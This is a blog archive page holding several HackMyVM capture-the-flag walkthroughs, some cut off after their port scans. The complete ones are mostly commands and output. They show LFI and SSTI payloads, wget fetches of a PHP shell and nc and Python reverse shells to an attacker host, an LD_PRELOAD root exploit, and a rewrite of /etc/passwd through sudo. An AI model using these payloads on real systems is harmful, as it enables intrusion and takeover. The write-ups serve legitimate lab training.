作者归档:站长

HackMyVm Blog Walkthrough

HackMyVm Blog Walkthrough

Scan ports.

nmap -sV -sC -p- -oN port.log 192.168.56.100
Nmap scan report for furious.hmv (192.168.56.100)
Host is up (0.0022s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 56:9b:dd:56:a5:c1:e3:52:a8:42:46:18:5e:0c:12:86 (RSA)
|   256 1b:d2:cc:59:21:50:1b:39:19:77:1d:28:c0:be:c6:82 (ECDSA)
|_  256 9c:e7:41:b6:ad:03:ed:f5:a1:4c:cc:0a:50:79:1c:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

继续阅读

HackMyVm Responder Walkthrough

HackMyVm Responder Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Responder

Scan ports, notice the port 22 is filtered.

nmap -sV -sC -oN port.log 192.168.56.100
Nmap scan report for darkmatter.hmv (192.168.56.100)
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)

Check port 80, only a simple page tells the current time.

~/D/responder $curl 192.168.56.100                                              
your answer is in the answer.. it's
01:46
and your time is running out..

Scan port 80, found filemanager.php. Scan threads can not be too big, I set it to 20.

~/D/responder $gobuster dir -u 192.168.56.100/ -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
/index.php            (Status: 200) [Size: 73]
/filemanager.php      (Status: 302) [Size: 0] [--> /]

Fuzz the param of filemanager.php, get random.

~/D/responder $wfuzz -u "192.168.56.100/filemanager.php?FUZZ=/etc/passwd"  -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 0
=====================================================================
ID           Response   Lines    Word       Chars       Payload                 
=====================================================================
000003395:   302        27 L     39 W       1430 Ch     "random"

LFI worked, check passwd, get two user names.

~/D/responder $curl "192.168.56.100/filemanager.php?random=/etc/passwd"         
root:x:0:0:root:/root:/bin/bash
...
elliot:x:1001:1001::/home/elliot:/bin/bash
rohit:x:1002:1002::/home/rohit:/bin/bash

After enum some linux files, we can not get shell through log files. So check source code of filemanager.php, we get a ssh key.

~/D/responder $curl "192.168.56.100/filemanager.php?random=php://filter/convert.base64-en
code/resource=filemanager.php" |base64 -d                                                
...          
<?php                                                                                    
    $filename = $_GET['random'];
    include($filename);
    header('Location:/');

/*

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED 
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4

XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
...

Decrypt the ssh key with john.

~/D/responder $/usr/share/john/ssh2john.py id_rsa > hash.txt                     
~/D/responder $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt         
...
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx          (id_rsa)

Now we have the user name, ssh key and password to connect port 22, but port 22 is filtered. Maybe it can be connected through ipv6.

Check ipv6 address of the machine.

~/D/responder $ping6 -c2 -n -I eth1 ff02::1                                    
ping6: Warning: source address might be selected on device other than: eth1
PING ff02::1(ff02::1) from :: eth1: 56 data bytes
...
64 bytes from fe80::a00:27ff:fec2:1426%eth1: icmp_seq=1 ttl=64 time=4.76 ms
...

Check port 22 with ipv6, yes, it's open.

~/D/responder $nmap -6 -p22 fe80::a00:27ff:fec2:1426%eth1    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 08:59 CST
Nmap scan report for fe80::a00:27ff:fec2:1426
Host is up (0.0097s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Log in ssh as user elliot.

~/D/responder $ssh elliot@fe80::a00:27ff:fec2:1426%eth1 -i id_rsa -6    
Enter passphrase for key 'id_rsa': 
Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
elliot@responder:~$ id
uid=1001(elliot) gid=1001(elliot) groups=1001(elliot)

Check sudo -l.

elliot@responder:~$ sudo -l
sudo: unable to resolve host responder: Temporary failure in name resolution
Matching Defaults entries for elliot on responder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on responder:
    (rohit) NOPASSWD: /usr/bin/calc

Run calc, enter help page, input "!/bin/bash" after ":".

elliot@responder:~$ sudo -u rohit /usr/bin/calc
sudo: unable to resolve host responder: Temporary failure in name resolution
C-style arbitrary precision calculator (version 2.12.7.2)
Calc is open software. For license details type:  help copyright
[Type "exit" to exit, or "help" for help.]

; help
...
For more information while running calc, type  help  followed by one of the
following topics:

    topic               description
    -----               -----------
    intro               introduction to calc
    overview            overview of calc
    help                this file
...
!/bin/bash
...
rohit@responder:/home/elliot$ id
uid=1002(rohit) gid=1002(rohit) groups=1002(rohit)

Check SUID files, notice polkit.

elliot@responder:~$ find / -perm -u=s 2>/dev/null
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/umount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

继续阅读

HackMyVm Messages Walkthrough

HackMyVm Messages Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Messages

Detect IP.

~/D/messages $sudo arp-scan --interface eth1 192.168.56.0/24                               
Interface: eth1, type: EN10MB, MAC: 00:0c:29:54:ae:ed, IPv4: 192.168.56.151
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0c       (Unknown: locally administered)
192.168.56.2    08:00:27:51:de:85       PCS Systemtechnik GmbH
192.168.56.100  08:00:27:64:e1:a1       PCS Systemtechnik GmbH

继续阅读

Hackmyvm Versteckt Walkthrough

Hackmyvm Versteckt Walkthrough

https://downloads.hackmyvm.eu/versteckt.zip

Scan ports.

nmap -sV -sC -p- -oN port.log 192.168.56.100
Nmap scan report for 192.168.56.100
Host is up (0.0020s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.51 ((Debian))
|_http-title: Index of /
|_http-server-header: Apache/2.4.51 (Debian)
22334/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 7b:c0:c0:c9:62:10:2f:67:ac:8d:d9:e5:88:26:15:93 (RSA)
|   256 59:73:c6:ce:52:8e:11:47:ba:9b:b1:51:41:3c:fa:18 (ECDSA)
|_  256 b4:e1:e1:f1:95:bb:b5:23:7e:2e:80:27:4a:a1:c7:ee (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

继续阅读

HackMyVm Preload Walkthrough

HackMyVm Preload Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Preload

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100
 Host is up (0.0029s latency).
 Not shown: 65532 closed tcp ports (conn-refused)
 PORT     STATE SERVICE    VERSION
 22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 4f:4c:82:94:2b:99:f8:ea:67:ff:67:3c:06:8a:71:b5 (RSA)
 |   256 c4:2c:9b:c8:12:93:2f:8a:f1:57:1c:f6:ab:88:b9:61 (ECDSA)
 |_  256 10:18:7b:11:c4:c3:d4:1a:54:cc:18:68:14:bb:2e:a7 (ED25519)
 80/tcp   open  http       nginx 1.18.0
 |_http-title: Welcome to nginx!
 |_http-server-header: nginx/1.18.0
 5000/tcp open  landesk-rc LANDesk remote management
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, but found nothing.

Browse port 5000, get error message.

```bash

  • Serving Flask app 'code' (lazy loading)
    • Environment: production
      •[31m WARNING: This is a development server. Do not use it in a production deployment.•[0m
      •[2m Use a production WSGI server instead.•[0m
    • Debug mode: off
      Traceback (most recent call last):
      File "/home/paul/code.py", line 18, in <module>
      app.run(host="0.0.0.0", port=50000)
      File "/usr/local/lib/python3.9/dist-packages/flask/app.py", line 920, in run
      run_simple(t.cast(str, host), port, self, **options)
      File "/usr/local/lib/python3.9/dist-packages/werkzeug/serving.py", line 1010, in run_simple
      inner()
      File "/usr/local/lib/python3.9/dist-packages/werkzeug/serving.py", line 950, in inner
      srv = make_server(
      File "/usr/local/lib/python3.9/dist-packages/werkzeug/serving.py", line 782, in make_server
      return ThreadedWSGIServer(
      File "/usr/local/lib/python3.9/dist-packages/werkzeug/serving.py", line 688, in init
      super().init(server_address, handler) # type: ignore
      File "/usr/lib/python3.9/socketserver.py", line 452, in init
      self.server_bind()
      File "/usr/lib/python3.9/http/server.py", line 138, in server_bind
      socketserver.TCPServer.server_bind(self)
      File "/usr/lib/python3.9/socketserver.py", line 466, in server_bind
      self.socket.bind(self.server_address)
      OSError: [Errno 98] Address already in use

Looks like it will start a server at port 50000.

Use telnet to connect port 5000.

~ telnet 192.168.56.100 5000
 Trying 192.168.56.100...
 Connected to 192.168.56.100.
 Escape character is '^]'.
  * Serving Flask app 'code' (lazy loading)
  * Environment: production
    WARNING: This is a development server. Do not use it in a production deployment.
    Use a production WSGI server instead.
  * Debug mode: off
  * Running on all addresses.
    WARNING: This is a development server. Do not use it in a production deployment.
  * Running on http://127.0.0.1:50000/ (Press CTRL+C to quit)

Then check port 50000, server is on.

 ~ curl  'http://192.168.56.100:50000'                                                                                                                                                                                    fish-0 | 0 [19:17:57]
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
 <title>500 Internal Server Error</title>
 <h1>Internal Server Error</h1>
 <p>The server encountered an internal error and was unable to complete your request.
 Either the server is overloaded or there is an error in the application.</p>

The error message told us it's a werkzeug app, so we think about SSTI.

First, we need to fuzz the param name.

 ~ wfuzz -u 'http://192.168.56.100:50000/?FUZZ=id'  
 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt --hh 290  
  /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl.
 Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 ********************************************************
 * Wfuzz 3.1.0 - The Web Fuzzer                         *
 ********************************************************
 Target: http://192.168.56.100:50000/?FUZZ=id
 Total requests: 43003
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000001525:   200        0 L      1 W        2 Ch        "cmd"  

Check if SSTI works.

```bash
~ curl "http://192.168.56.100:50000/?cmd=\{\{request.application.__globals__.__builtins__.__import__(%27os%27).popen('i
d').read()}}"
uid=1000(paul) gid=1000(paul) groups=1000(paul)


There is no nc, so we upload a php shell.

```bash
 ~ curl 'http://192.168.56.100:50000/?cmd=\{\{request.application.__globals__.__builtins__.__import__(%27os%27).popen(%2
 7wget%20http://192.168.56.150/r%20-O%20/tmp/reverse.php%27).read()\}\}'
 Welcome!!!!!!!!!!!!!â••
 ~ curl "http://192.168.56.100:50000/?cmd=\{\{request.application.__globals__.__builtins__.__import__(%27os%27).popen('l
 s%20-la%20/tmp').read()\}\}"
 total 76
 drwxrwxrwt  9 root root  4096 Jan 12 11:55 .
 drwxr-xr-x 18 root root  4096 Nov 30 02:38 ..
 drwxrwxrwt  2 root root  4096 Jan 12 08:24 .font-unix
 drwxrwxrwt  2 root root  4096 Jan 12 08:24 .ICE-unix  
 -rw-r--r--  1 paul paul  5496 Jan 12 11:57 reverse.php
 drwx------  3 root root  4096 Jan 12 08:24 systemd-private-dbfc2da2f510488995fc66521e5b22dd-systemd-logind.service-PH5a
 lg
 drwx------  3 root root  4096 Jan 12 08:24 systemd-private-dbfc2da2f510488995fc66521e5b22dd-systemd-timesyncd.service-9
 1KaVg
 drwxrwxrwt  2 root root  4096 Jan 12 08:24 .Test-unix
 drwxrwxrwt  2 root root  4096 Jan 12 08:24 .X11-unix
 drwxrwxrwt  2 root root  4096 Jan 12 08:24 .XIM-unix

Get reverse shell as user paul.

 ~ curl "http://192.168.56.100:50000/?cmd=\{\{request.application.__globals__.__builtins__.__import__(%27os%27).popen('p
 hp%20-f%20/tmp/reverse.php').read()\}\}"
 ————————————————————————————————————————————————————————————————————————————————————
 ~ nc -nlvp 1234
 Ncat: Version 7.92 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:40638.
 Linux preload 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64 GNU/Linux
  11:59:37 up  3:35,  0 users,  load average: 0.00, 0.05, 0.07
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=1000(paul) gid=1000(paul) groups=1000(paul)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=1000(paul) gid=1000(paul) groups=1000(paul)
 $

Check sudo -l.

$ sudo -l
 Matching Defaults entries for paul on preload:
     env_reset, mail_badpass, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/s
 bin\:/bin

 User paul may run the following commands on preload:
     (root) NOPASSWD: /usr/bin/cat, /usr/bin/cut, /usr/bin/grep, /usr/bin/tail, /usr/bin/head, /usr/bin/ss          

Use LD_PRELOAD to get root.

```bash
paul@preload:/tmp$ cat shell.c
cat shell.c

include <stdio.h>

include <sys/types.h>

include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
paul@preload:/tmp$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
shell.c: In function â••_initâ••:
shell.c:6:1: warning: implicit declaration of function â••setgidâ•• [-Wimplicit-function-declaration]
6 | setgid(0);
| ^~
shell.c:7:1: warning: implicit declaration of function â••setuidâ•• [-Wimplicit-function-declaration]
7 | setuid(0);
| ^~
paul@preload:/tmp$ sudo LD_PRELOAD=/tmp/shell.so /usr/bin/cat
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/cat

id

id
uid=0(root) gid=0(root) groups=0(root)

HackMyVm Confusion Walkthrough

HackMyVm Confusion Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Confusion

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log    
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 15:59 CST
 Nmap scan report for 192.168.56.100
 Host is up (0.0040s latency).
 Not shown: 65533 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 32145/tcp open  unknown
 | fingerprint-strings:
 |   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, NULL, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
 |     Welcome To The My Magic World
 |     many times you want to ping?:
 ...

Use nc to connect port 32145.

 ~ nc 192.168.56.100 32145                
 Welcome To The My Magic World

 How many times you want to ping?: 2
 PING localhost(localhost (::1)) 56 data bytes
 64 bytes from localhost (::1): icmp_seq=1 ttl=64 time=0.086 ms
 64 bytes from localhost (::1): icmp_seq=2 ttl=64 time=0.035 ms

If we input some invalid number, we will get error msg.

 ~ nc 192.168.56.100 32145                  
 Welcome To The My Magic World

 How many times you want to ping?: 12;
 Traceback (most recent call last):
   File "/opt/ping.py", line 7, in <module>
     no_of_packets = int(input("How many times you want to ping?: "))
   File "<string>", line 1
     12;
       ^
 SyntaxError: unexpected EOF while parsing
 ^C⏎                                          

If we input some evil code, we can make it run.

```bash
~ nc 192.168.56.100 32145
Welcome To The My Magic World

How many times you want to ping?: import("os").system("id")
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
PING localhost(localhost (::1)) 56 data bytes


So we can get reverse shell.

 ```bash
~ nc 192.168.56.100 32145      
 Welcome To The My Magic World

 How many times you want to ping?: __import__("os").system("nc 192.168.56.150 1234 -e /bin/bash")
 ──────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234                          
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:39196.
 id  
 uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)

Spawn an interactive shell.

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
iamroot@confusion:/$ id
id
uid=1002(iamroot) gid=1002(iamroot) groups=1002(iamroot)
iamroot@confusion:/$


Upload id_rsa.pub to get ssh login as iamroot.

 ```bash
iamroot@confusion:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys

We found 3 users, and check sudo -l.

```bash
iamroot@confusion:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 Oct 25 08:44 .
drwxr-xr-x 18 root root 4096 Oct 25 06:02 ..
drwxr-xr-x 2 iamroot iamroot 4096 Oct 25 15:16 iamroot
drwxr-xr-x 3 sammy sammy 4096 Oct 25 14:56 sammy
drwxr-xr-x 2 still still 4096 Oct 25 14:56 still
iamroot@confusion:/home$ sudo -l
sudo -l
Matching Defaults entries for iamroot on confusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User iamroot may run the following commands on confusion:
(!root) NOPASSWD: /bin/bash


But no matter what I input, still need input password.

Then we check the ssh login msg of user still.

 ```bash
~ ssh still@192.168.56.100  
 Have you ever thought?
      If
  Cindrella's
    Shoe Fit
   Perfectly
    Then Why
   Did It Fall
     Off?
 still:confused?
 Then go for Port 32145 :)

The default shell has been modified for still.

 iamroot@confusion:/home$ cat /etc/passwd
 ...
 still:x:1001:1001::/home/still:/home/still/SoMuchConfusion

We can check the source code of /home/still/SoMuchConfusion.

```bash
iamroot@confusion:/home$ su still
Password:
Welcome To My Secret Most Secure Shell :p
cat /home/still/SoMuchConfusion

!/bin/bash echo "Welcome To My Secret Most Secure Shell :p" read secure_shell if [[ $secure_shell == "id" ]] then echo "uid=0(root) gid=0(root) groups=0(root)" elif [[ $secure_shell == "whoami" ]] then echo "root" elif [[ $secure_shell =

= "python3" ]] then echo `$secure_shell` elif [[ $secure_shell =~ ^nc || $secure_shell =~ ^bash || $secure_shell =~ ^python* ]] then echo "Smooooooth Hehe :p" elif [[ -z $secure_shell ]] then echo "Bye-Bye" else echo `$secure_shell` com
mand not found fi command not found


So we need to bypass the blacklist to get a shell as user still. Here I choose /usr/bin/dash.

 ```bash
iamroot@confusion:/home$ su still
 Password:
 Welcome To My Secret Most Secure Shell :p
 /usr/bin/dash -i
 $ nc 192.168.56.150 1234 -e /bin/bash
 ───────────────────────────────────────────────────
 ~ nc -nlvp 1234      
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:39226.
 id
 uid=1001(still) gid=1001(still) groups=1001(still)

Spawn interactive shell again, and check sudo -l.

```bash
still@confusion:~$ sudo -l
sudo -l
Matching Defaults entries for still on confusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User still may run the following commands on confusion:
(sammy) NOPASSWD: /usr/bin/python3 /opt/password.py


Run it, we get an encrypted string.

 ```bash
still@confusion:~$ sudo -u sammy /usr/bin/python3 /opt/password.py
 sudo -u sammy /usr/bin/python3 /opt/password.py
 QWJCYXJQbmFQZW5weFpsQ25mZmpiZXEK

Try to decrypt it with ROT13. Then we can login as user sammy.

 ~ ssh sammy@192.168.56.100    ...
 sammy@192.168.56.100's password:
 sammy@confusion:~$ id
 uid=1000(sammy) gid=1000(sammy) groups=1000(sammy),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)

Check sudo -l.

```bash
sammy@confusion:~$ sudo -l
Matching Defaults entries for sammy on confusion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sammy may run the following commands on confusion:
(root) NOPASSWD: /usr/bin/unzip


Then we can modify /etc/passwd, zip it, and unzip it back to /etc.

```bash
 sammy@confusion:~$ cp /etc/passwd ./
 sammy@confusion:~$ openssl passwd 123
 fpjdFvRQf46EA
 sammy@confusion:~$ echo "root2:fpjdFvRQf46EA:0:0:root:/root:/bin/bash" >> passwd
 sammy@confusion:~$ zip passwd.zip passwd
   adding: passwd (deflated 63%)
 sammy@confusion:~$ sudo unzip passwd.zip -d /etc
 Archive:  passwd.zip
   inflating: /etc/etc/passwd        
 replace /etc/passwd? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
   inflating: /etc/passwd

Finally get root.

 sammy@confusion:~$ su root2
 Password:
 root@confusion:/home/sammy# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 confusion

HackMyVm Method Walkthrough

HackMyVm Method Walkthrough

Scan ports first.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.0025s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 4b:24:34:1f:41:10:88:b7:5a:6a:63:d9:f6:75:26:6f (RSA)
 |   256 52:46:e7:20:68:c1:6f:90:2f:a6:ad:ee:6d:87:e7:28 (ECDSA)
 |_  256 3f:ce:97:a9:1e:f4:60:f4:0e:71:e7:46:58:28:71:f0 (ED25519)
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Test Page for the Nginx HTTP Server on Fedora
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80, remember to enable .htm ext.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .htm,.html,.php,.txt,.php.bak,.bak,.zip -b
401,403,404,500 --wildcard -o 80.log --exclude-length 3690

/index.htm (Status: 200) [Size: 344]
/note.txt (Status: 200) [Size: 23]
/secret.php (Status: 302) [Size: 0]
[--> https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg]```;

Check source code of index.htm.

```bash
~ curl http://192.168.56.100/index.htm fish-0 | 0 [09:45:55]
<h1>It's Hacking Time</h1>
<img src="hacker.gif" alt="Hacker" height="640" width="640">
<img hidden="true" src="office.gif" alt="hahahahaha" height="640" width="640">
<form action="/secret.php" hidden="true" method="GET">
<input type="text" name="HackMyVM" value="" maxlength="100"><br>
<input type="submit" value="Submit">
</form>


With the hint from index.htm, we can call secret.php with param HackMyVM.

 ```bash
~ curl 'http://192.168.56.100/secret.php?HackMyVM=id'  
 Now the main part what it is loooooool<br>Try other method⏎

Seem get method is no correct. Let's try post method.

```bash
~ curl 'http://192.168.56.100/secret.php'; -d 'HackMyVM=id'
You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>⏎


Then we can get reverse shell.

 ```bash
~ curl 'http://192.168.56.100/secret.php' -d 'HackMyVM=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'
 ──────────────────────────────────────────────────────────────────────────────────

 & kali @ mykali in ~/Documents/method 0 [10:05:51]
 ~ nc -nvlp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:45958.
 bash: cannot set terminal process group (333): Inappropriate ioctl for device
 bash: no job control in this shell
 www-data@method:~/html$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 www-data@method:~/html$

Check source code of secret.php

```bash
www-data@method:~/html$ cat secret.php
cat secret.php
<?php
...
else {
header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg";);
}
$ok="prakasaka:th3-!llum!n@t0r";
?>


Escalate to user prakasaka.

 ```bash
www-data@method:~/html$ su prakasaka
 su prakasaka
 Password: th3-!llum!n@t0r
 id
 uid=1000(prakasaka) gid=1000(prakasaka) groups=1000(prakasaka),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)

Log in ssh as user prakasaka, check sudo -l.

```bash
prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
(!root) NOPASSWD: /bin/bash
(root) /bin/ip


We can get root.

 ```bash
prakasaka@method:~$ sudo ip netns add foo
 prakasaka@method:~$ sudo ip netns exec foo /bin/sh

 # id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 method

HackMyVm Breakout Walkthrough

HackMyVm Breakout Walkthrough

Key points: good enum

https://hackmyvm.eu/machines/machine.php?vm=Breakout

Scan ports.

 ~ nmap -sV -sC -p-  -Pn 192.168.33.145  -oN ports.log    
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.                              
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 22:02 CST                                                              
 Nmap scan report for 192.168.33.145                            
 Host is up (0.0022s latency).                                  
 Not shown: 65530 closed ports                                  
 PORT      STATE SERVICE     VERSION                            
 80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
 |_http-server-header: Apache/2.4.51 (Debian)                  
 |_http-title: Apache2 Debian Default Page: It works            
 139/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 445/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 10000/tcp open  http        MiniServ 1.981 (Webmin httpd)                                                                    
 |_http-title: 200 — Document follows                    
 20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
 |_http-title: 200 — Document follows
 Host script results:                                          
 |_clock-skew: 7h59m58s                                        
 |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:                                          
 |   2.02:                                                      
 |_    Message signing enabled but not required                
 | smb2-time:                                                  
 |   date: 2021-10-22T22:03:10                                  
 |_  start_date: N/A                                            

Check source code of index.html at port 80.

<!--
 don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

 ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

 -->

It's brainfuck code. Decode it online, get string `".2uqPEfj3D<P'a-3"`.

Use enum4linux to enum.

```bash
~ enum4linux 192.168.33.145 | tee enum.log
...
S-1-22-1-1000 Unix User\cyber (Local User)


With username cyber and password we decode from brainfuck code, we can login at port 20000.

In control panel, we found command shell.

image-20211022224903817.png

Run "nc 192.168.33.128 1234 -e /bin/bash", we can get reverse shell.

 ```bash
~ nc -nlvp 1234                                                                                          fish-0 | 0 [22:47:24]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.145.
 Ncat: Connection from 192.168.33.145:35206.
 id
 uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 cyber@breakout:~$

Search cap.

```bash
cyber@breakout:/$ getcap / -r 2>/dev/null
getcap / -r 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep


And we found password backup.

 ```bash
cyber@breakout:/tmp$ ls -la /var/backups
 ls -la /var/backups
 total 12
 drwxr-xr-x  2 root root 4096 Oct 20 07:49 .
 drwxr-xr-x 14 root root 4096 Oct 19 13:48 ..
 -rw-------  1 root root   17 Oct 20 07:49 .old_pass.bak

We can compress it can extract it in /tmp folder using /home/cyber/tar.

 cyber@breakout:/tmp$ /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar: Removing leading `/' from member names
 /var/backups/
 /var/backups/.old_pass.bak
 cyber@breakout:/tmp$ tar -xvf pass.tar
 tar -xvf pass.tar
 var/backups/
 var/backups/.old_pass.bak
 cyber@breakout:/tmp$ cd var/backups
 cd var/backups
 cyber@breakout:/tmp/var/backups$ cat .old_pass.bak
 cat .old_pass.bak
 Ts&4&YurgtRX(=~h

Finally we get root.

```bash
